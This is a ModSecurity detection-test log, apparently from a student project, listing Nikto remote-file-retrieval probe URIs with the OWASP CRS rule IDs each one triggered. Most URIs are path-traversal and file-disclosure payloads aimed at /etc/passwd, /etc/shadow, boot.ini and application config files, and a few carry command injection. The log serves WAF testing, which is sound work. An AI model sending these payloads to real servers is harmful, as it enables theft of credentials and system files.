# ms-inspectorlog v3.5
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/dit/Downloads/inspectorlog/ms-inspectorlog -l remote_file_retrieval.uri -t list -r /home/dit/Downloads/inspectorlog/etc/basic_rules.conf -o /home/dit/TFG/inspectorlog/modsecurity/web_estatica/owasp/opensource/nikto/remote_file_retrieval.clean
Packet [13]	Uri [/web/e7p2XeiK.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [15]	Uri [/web/e7p2XeiK.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [20]	Uri [/web/e7p2XeiK.bat]	Nattacks [1 ]	Signatures	[920440]
Packet [21]	Uri [/web/e7p2XeiK.dat]	Nattacks [1 ]	Signatures	[920440]
Packet [23]	Uri [/web/e7p2XeiK.sys]	Nattacks [1 ]	Signatures	[920440]
Packet [59]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [60]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini%00]	Nattacks [10 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[942460]
Packet [61]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini%00]	Nattacks [10 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[942460]
Packet [62]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [63]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/HASH(0x55f7f39761d8)%00]	Nattacks [13 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930110]	[933161]	[942450]	[942460]
Packet [64]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [88]	Uri [/web/192.168.1.101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [89]	Uri [/web/192.168.1.101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [92]	Uri [/web/192168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [93]	Uri [/web/192168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [100]	Uri [/web/site.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [101]	Uri [/web/site.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [130]	Uri [/web/192.168.1.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [131]	Uri [/web/192.168.1.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [156]	Uri [/web/1921681.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [157]	Uri [/web/1921681.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [164]	Uri [/web/192.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [165]	Uri [/web/192.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [172]	Uri [/web/192.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [173]	Uri [/web/192.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [188]	Uri [/web/192.168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [189]	Uri [/web/192.168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [190]	Uri [/web/192.168.1.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [191]	Uri [/web/192.168.1.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [194]	Uri [/web/1.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [195]	Uri [/web/1.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [212]	Uri [/web/backup.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [213]	Uri [/web/backup.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [214]	Uri [/web/192.168.1.101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [215]	Uri [/web/192.168.1.101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [246]	Uri [/web/168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [247]	Uri [/web/168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [266]	Uri [/web/168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [267]	Uri [/web/168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [276]	Uri [/web/backup.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [277]	Uri [/web/backup.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [284]	Uri [/web/site.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [285]	Uri [/web/site.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [298]	Uri [/web/192_168_1_101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [299]	Uri [/web/192_168_1_101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [302]	Uri [/web/192.168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [303]	Uri [/web/192.168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [314]	Uri [/web/1921681101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [315]	Uri [/web/1921681101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [320]	Uri [/web/101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [321]	Uri [/web/101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [330]	Uri [/web/101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [331]	Uri [/web/101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [338]	Uri [/web/1921681101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [339]	Uri [/web/1921681101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [340]	Uri [/web/1921681.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [341]	Uri [/web/1921681.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [348]	Uri [/web/192_168_1_101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [349]	Uri [/web/192_168_1_101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [380]	Uri [/web/1.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [381]	Uri [/web/1.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [410]	Uri [/web/192168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [411]	Uri [/web/192168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [507]	Uri [/web/../../../../../../../../../../../../etc/shadow]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [521]	Uri [/web/scripts/samples/details.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [525]	Uri [/web/[SecCheck]/..%2f../ext.ini]	Nattacks [4 ]	Signatures	[920440]	[930100]	[930110]	[930110]
Packet [526]	Uri [/web/[SecCheck]/..%255c..%255c../ext.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [527]	Uri [/web/[SecCheck]/..%252f..%252f../ext.ini]	Nattacks [4 ]	Signatures	[920440]	[930100]	[930110]	[930110]
Packet [530]	Uri [/web/.nsf/../winnt/win.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [531]	Uri [/web/prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [532]	Uri [/web/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [533]	Uri [/web/iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [534]	Uri [/web/iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	Nattacks [6 ]	Signatures	[920440]	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [537]	Uri [/web/................../config.sys]	Nattacks [1 ]	Signatures	[920440]
Packet [538]	Uri [/web/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [539]	Uri [/web/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [540]	Uri [/web/cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [541]	Uri [/web/netget?sid=user&msg=300&file=../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [542]	Uri [/web/netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [544]	Uri [/web/phpping/index.php?pingto=www.test.com%20|%20dir%20c:\\]	Nattacks [1 ]	Signatures	[932110]
Packet [545]	Uri [/web/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [546]	Uri [/web/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [547]	Uri [/web/wx/s.dll?d=/boot.ini]	Nattacks [2 ]	Signatures	[920440]	[930120]
Packet [548]	Uri [/web/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [549]	Uri [/web/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [550]	Uri [/web/ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [551]	Uri [/web/php/php.exe?c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [552]	Uri [/web/../../../../../../../../../boot.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [553]	Uri [/web/../../../../winnt/repair/sam._]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [554]	Uri [/web/..\\..\\..\\..\\..\\..\\..\\boot.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [557]	Uri [/web////./../.../boot.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [558]	Uri [/web/.cobalt/sysManage/../admin/.htaccess]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[930130]
Packet [559]	Uri [/web/albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [560]	Uri [/web/autohtml.php?op=modload&mainfile=x&name=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [561]	Uri [/web/atomicboard/index.php?location=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [562]	Uri [/web/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [563]	Uri [/web/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [564]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [565]	Uri [/web/cms/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [566]	Uri [/web/site/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [567]	Uri [/web/typo/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [568]	Uri [/web/typo3/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [569]	Uri [/web/DomainFiles/*//../../../../../../../../../../etc/passwd]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [570]	Uri [/web/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini]	Nattacks [1 ]	Signatures	[930120]
Packet [571]	Uri [/web/ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [574]	Uri [/web/index.php?download=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [575]	Uri [/web/index.php?|=../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [576]	Uri [/web/index.php?page=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [577]	Uri [/web/index.php?page=../../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [578]	Uri [/web/index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [579]	Uri [/web/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [580]	Uri [/web/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [581]	Uri [/web/k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [582]	Uri [/web/nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [583]	Uri [/web/nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[942460]
Packet [584]	Uri [/web/phprocketaddin/?page=../../../../../../../../../../boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [585]	Uri [/web/phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [586]	Uri [/web/phpwebfilemgr/index.php?f=../../../../../../../../../etc]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930110]	[942460]
Packet [587]	Uri [/web/phptonuke.php?filnavn=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [588]	Uri [/web/put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [589]	Uri [/web/ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [590]	Uri [/web/support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [591]	Uri [/web/viewpage.php?file=/etc/passwd]	Nattacks [2 ]	Signatures	[930120]	[932160]
Packet [592]	Uri [/web/Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [593]	Uri [/web/webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [594]	Uri [/web/webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [595]	Uri [/web/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [596]	Uri [/web/webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [597]	Uri [/web/logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|]	Nattacks [13 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [598]	Uri [/web/page.cgi?../../../../../../../../../../etc/passwd]	Nattacks [4 ]	Signatures	[930100]	[930110]	[930120]	[932160]
Packet [599]	Uri [/web/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [600]	Uri [/web/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [601]	Uri [/web/search?NS-query-pat=../../../../../../../../../../etc/passwd]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [602]	Uri [/web/search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [604]	Uri [/web/../webserver.ini]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [605]	Uri [/web/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full]	Nattacks [1 ]	Signatures	[920440]
Packet [607]	Uri [/web/../config.dat]	Nattacks [3 ]	Signatures	[920440]	[930100]	[930110]
Packet [609]	Uri [/web/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp]	Nattacks [3 ]	Signatures	[920272]	[930100]	[942460]
Packet [615]	Uri [/web/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp]	Nattacks [3 ]	Signatures	[920272]	[930100]	[942460]
Packet [616]	Uri [/web/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml]	Nattacks [3 ]	Signatures	[930100]	[930110]	[930110]
Packet [617]	Uri [/web/data/owncloud.log]	Nattacks [1 ]	Signatures	[920440]
Packet [619]	Uri [/web/data/owncloud.db]	Nattacks [1 ]	Signatures	[920440]
Packet [620]	Uri [/web/cloud/data/owncloud.log]	Nattacks [1 ]	Signatures	[920440]
Packet [622]	Uri [/web/cloud/data/owncloud.db]	Nattacks [1 ]	Signatures	[920440]
Packet [623]	Uri [/web/owncloud/data/owncloud.log]	Nattacks [1 ]	Signatures	[920440]
Packet [625]	Uri [/web/owncloud/data/owncloud.db]	Nattacks [1 ]	Signatures	[920440]
Packet [626]	Uri [/web/ownCloud/data/owncloud.log]	Nattacks [1 ]	Signatures	[920440]
Packet [628]	Uri [/web/ownCloud/data/owncloud.db]	Nattacks [1 ]	Signatures	[920440]
Packet [629]	Uri [/web/OwnCloud/data/owncloud.log]	Nattacks [1 ]	Signatures	[920440]
Packet [631]	Uri [/web/OwnCloud/data/owncloud.db]	Nattacks [1 ]	Signatures	[920440]
Packet [632]	Uri [/web/data/owncloud.log]	Nattacks [1 ]	Signatures	[920440]
Packet [633]	Uri [/web/cloud/data/owncloud.log]	Nattacks [1 ]	Signatures	[920440]
Packet [634]	Uri [/web/owncloud/data/owncloud.log]	Nattacks [1 ]	Signatures	[920440]
Packet [635]	Uri [/web/ownCloud/data/owncloud.log]	Nattacks [1 ]	Signatures	[920440]
Packet [636]	Uri [/web/OwnCloud/data/owncloud.log]	Nattacks [1 ]	Signatures	[920440]
Packet [642]	Uri [/web/data/owncloud.db]	Nattacks [1 ]	Signatures	[920440]
Packet [643]	Uri [/web/cloud/data/owncloud.db]	Nattacks [1 ]	Signatures	[920440]
Packet [644]	Uri [/web/owncloud/data/owncloud.db]	Nattacks [1 ]	Signatures	[920440]
Packet [645]	Uri [/web/ownCloud/data/owncloud.db]	Nattacks [1 ]	Signatures	[920440]
Packet [646]	Uri [/web/OwnCloud/data/owncloud.db]	Nattacks [1 ]	Signatures	[920440]
Packet [653]	Uri [/web/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [654]	Uri [/web/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [655]	Uri [/web/magmi-importer/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [656]	Uri [/web/magento/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [657]	Uri [/web/magento/magmi-importer/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [658]	Uri [/web/shop/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [659]	Uri [/web/shop/magmi-importer/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility]	Nattacks [7 ]	Signatures	[930100]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [660]	Uri [/web/web/download_file.php?file=../../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [661]	Uri [/web/magmi/web/download_file.php?file=../../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [662]	Uri [/web/magmi-importer/web/download_file.php?file=../../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [663]	Uri [/web/magento/magmi/web/download_file.php?file=../../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [664]	Uri [/web/magento/magmi-importer/web/download_file.php?file=../../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [665]	Uri [/web/shop/magmi/web/download_file.php?file=../../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [666]	Uri [/web/shop/magmi-importer/web/download_file.php?file=../../../../../../../../../../../etc/passwd]	Nattacks [6 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [667]	Uri [/web/web/download_file.php?file=../../app/etc/local.xml]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [668]	Uri [/web/magmi/web/download_file.php?file=../../app/etc/local.xml]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [669]	Uri [/web/magmi-importer/web/download_file.php?file=../../app/etc/local.xml]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [670]	Uri [/web/magento/magmi/web/download_file.php?file=../../app/etc/local.xml]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [671]	Uri [/web/magento/magmi-importer/web/download_file.php?file=../../app/etc/local.xml]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [672]	Uri [/web/shop/magmi/web/download_file.php?file=../../app/etc/local.xml]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [673]	Uri [/web/shop/magmi-importer/web/download_file.php?file=../../app/etc/local.xml]	Nattacks [5 ]	Signatures	[930100]	[930110]	[930110]	[930120]	[942460]
Packet [681]	Uri [/web/jfX7Xuf5.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [685]	Uri [/web/jfX7Xuf5.htw]	Nattacks [1 ]	Signatures	[920440]
Packet [686]	Uri [/web/jfX7Xuf5.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [688]	Uri [/web/jfX7Xuf5.cfg]	Nattacks [1 ]	Signatures	[920440]
Packet [695]	Uri [/web/jfX7Xuf5.ini]	Nattacks [1 ]	Signatures	[920440]
Packet [739]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [740]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/HASH(0x55fee6b4d568)%00]	Nattacks [13 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930110]	[933161]	[942450]	[942460]
Packet [741]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [742]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini%00]	Nattacks [10 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[942460]
Packet [743]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini%00]	Nattacks [10 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[942460]
Packet [744]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [766]	Uri [/web/1921681101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [767]	Uri [/web/1921681101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [788]	Uri [/web/192168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [789]	Uri [/web/192168.sql]	Nattacks [1 ]	Signatures	[920440]
